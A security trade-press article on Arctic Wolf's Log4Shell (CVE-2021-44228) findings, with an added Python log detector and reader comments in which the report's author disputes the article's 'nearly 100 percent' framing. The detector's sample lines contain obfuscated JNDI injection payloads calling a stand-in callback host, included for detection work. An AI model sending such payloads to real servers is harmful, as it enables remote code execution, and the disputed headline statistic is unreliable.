Log4Shell Vulnerability Analysis: Arctic Wolf Findings Offer MSP, MSSP Security Guidance

Nearly 100 percent of the post-compromise behaviors tied to the Log4Shell vulnerability (CVE-2021-44228) have been linked to attempted installation of the XMRig cryptocurrency miner and to Night Sky ransomware campaigns associated with the Aquatic Panda threat actor, according to an analysis of more than 2,300 Arctic Wolf customers performed in January 2022.

The presence of XMRig shows that an attacker can use Log4Shell to deploy unauthorized software in an end user's environment, Arctic Wolf noted. That makes it a "much higher severity threat" than the potentially unwanted application (PUA) label under which XMRig is commonly classified would suggest.

Arctic Wolf also detected a Night Sky payload and its associated activity by observing attempted PowerShell use and matching other indicators of compromise (IOCs), the company indicated. It found Night Sky IOCs across eight customers.

Other notable findings from Arctic Wolf’s Log4Shell analysis included:

  • 29,338 unique incidents of adversarial scanning for Log4Shell were discovered as of Jan. 25, 2022, targeting 807 customers.
  • Fewer than 2.5 percent of customers were still susceptible to Log4Shell exploits.
  • Successful remote code execution was observed in 252 incidents.

How to Protect Against Log4Shell

Strong security practices play a key role in mitigating Log4Shell exploits and other evolving threats before an organization's IT infrastructure is compromised, Arctic Wolf stated. A "defense-in-depth approach" lets an organization guard against such issues even when a single control fails.

Furthermore, an organization must explore ways to continuously improve its security posture, Arctic Wolf said. It also must use a combination of human expertise and technology to protect against cyberattacks now and in the future.

Meanwhile, many third-party scanner tools are available to help MSSPs and MSPs combat Log4Shell. Some of these tools focus on threat identification and detection, others on remediation and reporting.
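The scanning counted in the findings above mostly arrives as `${jndi:...}` lookup strings in HTTP headers or parameters, and scanners routinely hide them behind URL encoding and Log4j's own nested lookups (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`), which a plain search for `jndi:` misses. The following Python detector is an added example, not code from this article or from Arctic Wolf: it normalizes those obfuscation forms before matching and runs over a few constructed access-log lines (the IP addresses and paths are made up for illustration).

```python
"""Detect Log4Shell (CVE-2021-44228) scanning attempts in web access logs.

Added example. Attacker strings such as ${jndi:ldap://host/x} are commonly
disguised with URL encoding and with Log4j's nested lookups, for instance
${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}. Log4j resolves
the innermost lookup first, so the detector does the same before matching.
"""
import re
from urllib.parse import unquote

# Lookups used only for obfuscation: ${lower:j}, ${upper:J}, ${::-j}, ${env:NOPE:-j}
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# What is left after de-obfuscation: a JNDI lookup pointing at a remote scheme.
_JNDI = re.compile(
    r"\$\{\s*jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/}\s]+)",
    re.IGNORECASE,
)
_CLIENT_IP = re.compile(r"^(\S+)")

# Constructed sample log lines in combined format (not from the Arctic Wolf report).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.8 - - [12/Dec/2021:10:01:06 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/x}" "Mozilla/5.0"',
    '198.51.100.10 - - [12/Dec/2021:10:01:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://203.0.113.9/t}"',
]


def normalise(text: str, max_rounds: int = 8) -> str:
    """Undo URL encoding and collapse nested Log4j lookups, innermost first.

    The loop is bounded so a hostile line cannot keep the detector busy.
    """
    for _ in range(max_rounds):
        prev = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == prev:
            break
    return text.lower()


def detect(log_lines):
    """Return one finding per line that still carries a JNDI lookup after normalisation."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        decoded = normalise(line)
        m = _JNDI.search(decoded)
        if not m:
            continue
        findings.append({
            "line": lineno,
            "client": _CLIENT_IP.match(line).group(1),
            "scheme": m.group(1).lower(),
            "target": m.group(2),      # callback host[:port] the victim JVM would contact
            "indicator": m.group(0),   # normalised string, useful as a hunting IOC
        })
    return findings


def callback_hosts(findings):
    """Distinct attacker callback hosts, stripped of port, for blocklisting or hunting."""
    return sorted({f["target"].split(":")[0] for f in findings})


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"line {f['line']}: {f['client']} -> {f['scheme']} {f['target']}  ({f['indicator']})")
    print("callback hosts:", callback_hosts(hits))
```

The `target` field is worth more than the match itself: an outbound LDAP, RMI or DNS connection from a Java host to that address is the signal that a scan turned into the successful remote code execution the findings count, so it belongs in network-sensor and egress-filter rules, not only in the web-log alert.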

    Olivia L.:

    You are seriously positioning Arctic Wolf as an expert – a company who started out with homegrown sub-par endpoint and SIEM solutions with very mediocre customer satisfaction? Nearly 100% of their 2300 customers Log4Shell have been linked to attempted installation of the XMrig cryptocurrency miner and Night Sky ransomware campaigns associated with the Aquatic Panda threat actor? I would be curious to know how quickly Arctic Wolf was able to detect the anomalous behavior and what documented proactive actions were taken that is unique.
    Perhaps you should reconsider using them as future sources.

    Ian McShane:

    Hi Olivia – thanks for reading and commenting. My name is Ian McShane, I work at Arctic Wolf and I was the author of the blog that this article references. It is available here if you care to take a read: https://arcticwolf.com/resources/blog/log4shell-in-the-field-brief-analysis-through-january-2022

    I wanted to offer a few clarifying points.

    At no point did we claim that “nearly 100%” of our 2,300 customers were linked to this. As a matter of fact, less than 2.5% of our customers saw anything more than opportunistic scanning – this is also noted in this article 🙂

    As for how we can detect the behavior – well we have our network sensor that is able to analyse north/south and east/west net flow so we can see and detect the activity that way, as well as many integrations with security products that generate event data sources, on-device security, OS logging, and more.

    I hope that helps, and please do get in touch if it doesn’t. I’m happy to talk live at anytime.
